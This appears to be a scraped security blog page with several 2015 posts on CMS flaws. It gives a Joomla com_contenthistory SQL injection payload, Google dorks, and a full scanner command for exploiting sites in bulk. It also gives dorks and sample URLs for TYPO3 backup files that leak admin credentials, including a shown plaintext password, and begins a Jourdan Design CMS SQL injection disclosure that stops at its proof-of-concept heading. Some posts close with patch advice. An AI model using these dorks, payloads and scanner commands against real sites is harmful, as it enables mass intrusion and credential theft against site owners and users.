<b>INJECT:</b><span style="font-family: Courier New, Courier, monospace;"> <i>0x203a494e55524c42523a20</i>,version(),<i>0x203a494e55524c42523a20</i>....</span></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">DORK:</span></b><br />
<ol>
<li><span style="font-family: Georgia, Times New Roman, serif;">components/com_contenthistory/</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">inurl:com_contenthistory</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">index.php?option=com_contenthistory</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">"index of" components/com_contenthistory/</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">inurl:"components/com_contenthistory/"</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">inurl:"index.php?option=com_contenthistory"</span></li>
</ol>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Search demonstration:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGfwxLTuZPN83tjNRgJ3PbuvhYfBMnx2QOsPo1TFzoQd13q-tZhA6fgTOUVCVMiT7Fju7YNukjbFhO53IGbP9ZpU5x9X55cBBy7Mee1nTTJWlMCfl12l2qoxoja4CTNAaxysuXnntH7vH/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"" border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGfwxLTuZPN83tjNRgJ3PbuvhYfBMnx2QOsPo1TFzoQd13q-tZhA6fgTOUVCVMiT7Fju7YNukjbFhO53IGbP9ZpU5x9X55cBBy7Mee1nTTJWlMCfl12l2qoxoja4CTNAaxysuXnntH7vH/s640/joomla.png" title="DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"" width="475" /></a></div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Using inurlbr scanner for mass exploitation:</span></b><br />
Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<b>- Creating our command</b><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET DORK:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>--dork '</b>YOU_DORK<b>'</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> OR</span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>--dork-file '</b>YOU_FILE_DORK.txt<b>'</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET SEARCH ENGINES:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>-q all</b></span><br />
<i> we will use all the search engines available in the script</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET OUTPUT FILE:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>-s</b> com_contenthistory.txt</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET TIPE VALIDATION:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>-t 2</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> 2 </span><span style="font-family: Times, Times New Roman, serif;"><i>The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'</i></span><br />
<span style="font-family: Times, Times New Roman, serif;"><i> It also establishes connection with the exploit through the get method.</i></span><br />
<br />
<i>Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Internal function - Converting strings in hexadecimal</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"> hex Encrypt values in hex.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: hex({value})</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: hex(102030)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: --exploit-get 'user?id=hex(102030)'</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Result inject:</span><br />
<span style="font-family: Courier New, Courier, monospace;"> http://www.target.localhost.br/user?id=313032303330</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>--exploit-get</b> <b>'</b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))<b>'</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">hex(INURLBR)</span></b> = 494e55524c4252<br />
<br />
<b><span style="font-family: Courier New, Courier, monospace;">Example injection:</span></b><br />
<span style="font-family: 'Courier New', Courier, monospace;">http://www.target.localhost.br</span><span style="font-family: 'Courier New', Courier, monospace;">/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET STRING VALIDATION:</b></span><br />
<i><span style="font-family: Times, Times New Roman, serif;">Specify the string that will be used on the search script:</span></i><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: -a {string}</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: -a '<title>hello world</title>'</span><br />
<span style="font-family: Courier New, Courier, monospace;"> </span><i><span style="font-family: Courier New, Courier, monospace;"> </span><span style="font-family: Times, Times New Roman, serif;">If specific value is found in the target he is considered vulnerable.</span></i><br />
<span style="font-family: Courier New, Courier, monospace;"> Setting: <b>-a '</b>INURLBR<b>'</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILTER RESULTS:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b> --unique</b></span><br />
<i><span style="font-family: Times, Times New Roman, serif;"> Filter results in unique domains.</span></i><br />
<i><span style="font-family: Times, Times New Roman, serif;"> removes all gets the URL</span></i><br />
<div>
<br /></div>
<div>
<span style="font-family: Times, Times New Roman, serif;"><i>Let's validate the string <b>"INURLBR"</b> as she passed within the SQLI exploit, if such value appear on our target was successfully injected.</i></span></div>
<div>
<br /></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>COMMAND FULL: </b></span><br />
<span style="font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork '</b>inurl:"/components/com_contenthistory"<b>'</b> <b>-s</b> com_contenthistory.txt <b>--exploit-get '</b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0x<b><i>hex(INURLBR)</i></b>,versio(),0x<b><i>hex(INURLBR)</i></b>,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))<b>'</b> <b>-t</b> 3 <b>-a '</b>INURLBR<b>' --unique</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b>Execution return:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHOuCgeciGHpijfV4tlrTQUtSi7GPc3vsLjYkbUdiql3o_Rz5eipHgJC9Dj5DKh64Sk9vAa7_-9WfpXp9VbHgWg7FWCwQhV500thvpvt_xTv1n7mXLmvdLt0cR2UchIQVc7z-fgu6nNaj3/s1600/Captura+de+tela+de+2015-10-27+03%253A40%253A53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'INURLBR' SET FILTER RESULTS: --unique Filter results in unique domains. removes all gets the URL Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected. COMMAND FULL: php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique Execution return:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHOuCgeciGHpijfV4tlrTQUtSi7GPc3vsLjYkbUdiql3o_Rz5eipHgJC9Dj5DKh64Sk9vAa7_-9WfpXp9VbHgWg7FWCwQhV500thvpvt_xTv1n7mXLmvdLt0cR2UchIQVc7z-fgu6nNaj3/s640/Captura+de+tela+de+2015-10-27+03%253A40%253A53.png" title=" SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'INURLBR' SET FILTER RESULTS: --unique Filter results in unique domains. removes all gets the URL Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected. COMMAND FULL: php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique Execution return:" width="640" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b>SOLUTION:</b></span><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">Trustwave SpiderLabs</a> <i>recommends that ALL Joomla users update their Joomla installations to version 3.4.5.</i><br />
<b>UPDATE:</b><br />
<a href="https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html" style="font-style: italic;" target="_blank">https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html</a><br />
<br />
<b>Source INFO-1</b>-> <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0</a><br />
<br />
<b>Source INFO-2</b>-> <a href="https://cxsecurity.com/issue/WLB-2015100146" target="_blank">https://cxsecurity.com/issue/WLB-2015100146</a><br />
<br /></div>
<div>
<b>Source INFO-3</b>-><a href="https://www.blogger.com/%C2%A0http://pplware.sapo.pt/informacao/alerta-milhoes-de-sites-baseados-no-joomla-estao-vulneraveis/" target="_blank"> http://pplware.sapo.pt/informacao/alerta-milhoes-de-sites-baseados-no-joomla-estao-vulneraveis/</a></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com6tag:blogger.com,1999:blog-5670232360751087799.post-6946181171667655842015-10-14T02:56:00.002-03:002015-11-19T21:36:22.032-02:00( 0day ) CMS Typo3 / Falha Full Info Disclosure<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbRj0d3Vf_BfNXDH7QYNmPlOAmGxhB_Go2LnY59ogV5JjIM5NiIP1dR54SE6ypjtn6VIPBTlexFNPimxtveR9F557Kukqn9HSqESMYS2SIlHN0Uk47KFhbXGzdBsqncaCYn1E27GT1RqN9/s1600/typo3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor. No procedimento de criar dork, refazer, criar um novo padrão acabei descobrindo uma falha no CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma." border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbRj0d3Vf_BfNXDH7QYNmPlOAmGxhB_Go2LnY59ogV5JjIM5NiIP1dR54SE6ypjtn6VIPBTlexFNPimxtveR9F557Kukqn9HSqESMYS2SIlHN0Uk47KFhbXGzdBsqncaCYn1E27GT1RqN9/s640/typo3.png" title="Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor. No procedimento de criar dork, refazer, criar um novo padrão acabei descobrindo uma falha no CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma." width="640" /></a></div>
<br />
Continuando minhas pesquisas atrás de vulnerabilidade em <b>CMS's</b>, nos últimos dias estava procurando por padrões em arquivos .<b>XML,T3D</b>, que me pudessem trazer informações sensíveis do servidor.<br />
No procedimento de criar dork, refazer e criar um novo padrão. acabei descobrindo uma falha no<br />
CMS <b>TYPO3</b> que possibilita acessar arquivos <b>XML,T3D </b>do servidor que contenham <b>LOGIN</b> & <b>SENHA</b> da plataforma.<br />
<div style="text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<div style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2QHGgWkPywtd3xAEfG8t-VfxGaRlqLdc7mwG7EQ-gqMFwApAOe-FelmHqETGMrClv-9caHzcpS5aLVCYpbPftHVfcyblK1bDnSez9I3Y2el-4NFHIiwXsDwPQ8puvUlYTjB4GTvdoRzpB/s1600/giphy.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt=""Não é um CMS muito usado, o artigo é somente para estudos mesmo, um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."" border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2QHGgWkPywtd3xAEfG8t-VfxGaRlqLdc7mwG7EQ-gqMFwApAOe-FelmHqETGMrClv-9caHzcpS5aLVCYpbPftHVfcyblK1bDnSez9I3Y2el-4NFHIiwXsDwPQ8puvUlYTjB4GTvdoRzpB/s400/giphy.gif" title=""Não é um CMS muito usado, o artigo é somente para estudos mesmo, um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."" width="400" /></a><b></b></span><br />
<div style="text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b><b><span style="font-size: large;">"Não é um CMS muito usado, o artigo é somente para estudos mesmo. Um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."</span></b></b></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Observando bem os arquivos eles seguem um padrão de <b>backup</b> do próprio sistema, em pastas desprotegidas. O Google indexa seu conteúdo que é totalmente possível acessá-los com operadores avançados de pesquisa - (<b>DORKS</b> / <b>STRINGS</b>).<br />
Os arquivos de senha são guardados na pasta <b>"/fileadmin/" </b>alguns<b> </b>com uma string fixa nome<b> "utopia" </b>e sua extensão é<b> ".t3d.xml" </b>ou<b> .t3d</b><br />
<b><br /></b>
<br />
<pre><b><span style="font-size: large;">INFORMAÇÕES:</span></b>
# ----------------------------------------------------------
#[+] Type: Full Info Disclosure
#[+] Vendor: https://typo3.org/typo3-cms/
#[+] VULNERABLE VERSIONS: 4.2, 4.5
# ----------------------------------------------------------
#[+] AUTOR: googleINURL
#[+] EMAIL: inurlbr@gmail.com
#[+] Blog: http://blog.inurl.com.br
#[+] Twitter: https://twitter.com/googleinurl
#[+] Fanpage: https://fb.com/InurlBrasil
#[+] Pastebin http://pastebin.com/u/Googleinurl
#[+] GIT: https://github.com/googleinurl
#[+] PSS: http://packetstormsecurity.com/user/googleinurl
#[+] YOUTUBE: http://youtube.com/c/INURLBrasil
#[+] PLUS: http://google.com/+INURLBrasil
#[+] IRC: irc.pŕiv8.jp / #inurlbrasil
</pre>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> DORKS DE PESQUISA:</span></b><br />
<ol>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">/fileadmin/utopia ext:xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">/fileadmin/utopia*.t3d.xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">site:fr /fileadmin/utopia ext:xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">"utopia" inurl:t3d ext:xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">/fileadmin/ typo3 ext:t3d</span></b></li>
</ol>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">POC ARQUIVO .XML:</span></b><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/fileadmin/utopia{random}.t3d.xml</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/subdir/fileadmin/utopia{random}.t3d.xml</span><br />
<b>Ex:</b><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml</span><br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Exemplo Conteúdo arquivo:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETEJq6ebE91dGqnufEgjUHbJSkMrQrSNxkkte-zNEAiTJ8BzKw8U5M5wHLSgcDc7QowkVvpC5DN44HuLnLkGVtdGOzNVBiNOPTqZCSRX_42uyfT3xwjf6wh7LVbn8-6dHdzZhgBqEhVhw/s1600/Captura+de+tela+de+2015-10-14+02%253A12%253A34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETEJq6ebE91dGqnufEgjUHbJSkMrQrSNxkkte-zNEAiTJ8BzKw8U5M5wHLSgcDc7QowkVvpC5DN44HuLnLkGVtdGOzNVBiNOPTqZCSRX_42uyfT3xwjf6wh7LVbn8-6dHdzZhgBqEhVhw/s640/Captura+de+tela+de+2015-10-14+02%253A12%253A34.png" width="640" /></a></div>
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">POC ARQUIVO .T3D:</span></b><br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/fileadmin/*.t3d</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/fileadmin/</span><span style="font-family: "courier new" , "courier" , monospace;">archives_site</span><span style="font-family: "courier new" , "courier" , monospace;">/*.t3d</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/subdir/fileadmin/</span><span style="font-family: "courier new" , "courier" , monospace;">*.t3d</span><br />
<b>Ex:</b><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d</span><br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Exemplo Conteúdo arquivo:</span></b><br />
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace;">s:11:"admin_xxxx";s:5:"email";s:26:"admin@xxxx-autoxxxx.fr";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"admin@xxx-autopartage.fr";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1</span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Pesquisa em massa usando SCANNER <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a>.</b>
</span></pre>
<pre style="word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">Download: </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;"><a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></span></span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">Comando:</span></b></pre>
<pre style="word-wrap: break-word;"><span style="color: red;"><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">php inurlbr.php --dork '</span><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;">/fileadmin/utopia*.t3d.xml</span></span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">' -s </span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">t3d.txt -t 2 -a '</span><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;"><username></span></span></span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;"><span style="color: red;">'</span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Np5y4IbrHIbNVkgHYrQyfouLeDIAcbg35V7aQBqx4_9mHisA_2yhcbLrIKjcGYQm7zPexzvVHAh5vnG2K94PODU9OxjQHgxGB_sb-RvsBEX0r7BSHNG0e80CtM7kwanCXGf0-VKk5yp/s1600/giphy+%25281%2529.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Np5y4IbrHIbNVkgHYrQyfouLeDIAcbg35V7aQBqx4_9mHisA_2yhcbLrIKjcGYQm7zPexzvVHAh5vnG2K94PODU9OxjQHgxGB_sb-RvsBEX0r7BSHNG0e80CtM7kwanCXGf0-VKk5yp/s320/giphy+%25281%2529.gif" width="320" /></a></div>
</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;"><b>Resultado:</b></span><span style="font-family: "courier new" , "courier" , monospace; white-space: pre-wrap;">
</span><div class="separator" style="clear: both; font-family: 'Courier New', Courier, monospace; text-align: center; white-space: pre-wrap;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCPYzyznBnw8EC8CEdVFQLJiGjRpKtg3jFrBTXJ4Dyp2GjaOtDrZQsuykv6AQMxfcTYkeS97dIjDvqCFaB9CzZ_b9w0RhLIPanfo0eQSmLTr-lienN9G02Yg0Uta-h46aM-YwIRzohihsP/s1600/Captura+de+tela+de+2015-10-14+02%253A29%253A37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCPYzyznBnw8EC8CEdVFQLJiGjRpKtg3jFrBTXJ4Dyp2GjaOtDrZQsuykv6AQMxfcTYkeS97dIjDvqCFaB9CzZ_b9w0RhLIPanfo0eQSmLTr-lienN9G02Yg0Uta-h46aM-YwIRzohihsP/s640/Captura+de+tela+de+2015-10-14+02%253A29%253A37.png" width="640" /></a></div>
<span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">
</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Solução ?</b></span><span style="font-family: "courier new" , "courier" , monospace;">
<i>Faça upgrade do CMS e Configure adequadamente as permissões de arquivos e pastas do se servidor.</i>
</span></span></pre>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com3tag:blogger.com,1999:blog-5670232360751087799.post-86349558333163332142015-09-30T21:32:00.000-03:002015-10-14T11:56:38.883-03:00( 0day ) - CMS Jourdan Design - SQL INJECTIONBom continua minhas pesquisas com ( <b>CMS's</b> ) brasileiros, esbarrei nas minhas "<b>Googladas</b>" com o CMS da empresa<b> Jourdan Design</b>.<br />
Que o mesmo apresenta falhas graves de injeção SQL, via request <b>POST</b> & <b>GET</b>.<br />
Como não achei código fonte, ou padrão de outros cms's deduzi que eles usam uma aplicação priv8.<br />
<br />
Vamos aos fatos....<br />
Em uma pequena e rápida analise é possível constatar <b>MÚLTIPLAS VULNERABILIDADES</b>:<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>INFORMAÇÕES:</b></span><br />
<br />
<pre>[+] FORNECEDOR: http://www.jourdandesign.com.br
[+] VERSÕES VULNERÁVEIS: <i>(NÃO IDENTIFICADO)</i>
[+] ARQUIVO: VIA POST: newsletter_done.php, pesquisa_done.php
VIA GET : nossa_historia_texto.php
[+] DORK: "by Jourdan Design" "news_not_pk"
[+] REPORTADO: 30/09/2015
</pre>
<br />
Senhoras e Senhores que estão lendo esse humilde artigo, não quero falar que isso é uma falha grande<br />
E que vai afetar milhões de pessoas ... pois não vai, essa "plataforma" ou emaranhado de códigos<br />
não filtrados afeta no máximo seus usuários/clientes, mas o grande intuito é mostrar filtros com PDO..<br />
e filtros desprotegidos e algumas boas condutas.<br />
<br />
( Todo desenv sabe || deveria saber ) que sistemas quando vão para produção tem que está como seus erros tratados, pelo menos deveriam certo (?!).<br />
Quase toda aplicação que é invadida via <b>SQL - INJECTION</b> é devido seus erros não tratados no server side, muitas vezes são ownadas por 'BOTS', sim bots. que ao identificar esse erro de <b>Syntax SQL</b> já começa injetar comandos par extração de informações.<br />
<br />
MAS SÓ TRATAR OS ERROS DA MINHA APLICAÇÃO JÁ ME DEIXA SEGURO ?<br />
A resposta é <b>NÃO!</b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvo1cHFYi04LRfK9YOtsGQPPqOe_Hkp1Sxx0NcchpZPTgcjxEzncTKHCtToSrNX9ZMX6xWBHh2im4bnfl1dy3yTsyFv34TLk0wAjyoevuZP0oBdGNi9y5K6HNTSicj46-0aFoZepeJShib/s1600/nao-me-diga-meme1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MAS SÓ TRATAR OS ERROS DA MINHA APLICAÇÃO JÁ ME DEIXA SEGURO ? A resposta é NÃO!" border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvo1cHFYi04LRfK9YOtsGQPPqOe_Hkp1Sxx0NcchpZPTgcjxEzncTKHCtToSrNX9ZMX6xWBHh2im4bnfl1dy3yTsyFv34TLk0wAjyoevuZP0oBdGNi9y5K6HNTSicj46-0aFoZepeJShib/s400/nao-me-diga-meme1.jpg" title="MAS SÓ TRATAR OS ERROS DA MINHA APLICAÇÃO JÁ ME DEIXA SEGURO ? A resposta é NÃO!" width="400" /></a></b></div>
<br />
<br />
Apesar de ser informações básicas tanto pequenas quanto grande empresas incluindo governos ainda sofrem com isso.<br />
<br />
Vamos aos BUGS da <a href="http://www.jourdandesign.com.br/" target="_blank">Jourdandesign</a><br />
<i>Demonstrarei somente um.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>ARQUIVO:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">newsletter_done.php</span><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">REQUEST POST:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">nome=bypass&email=bypass@aduneb.com.br&Submit3=cadastrar</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>POC:</b></span><br />
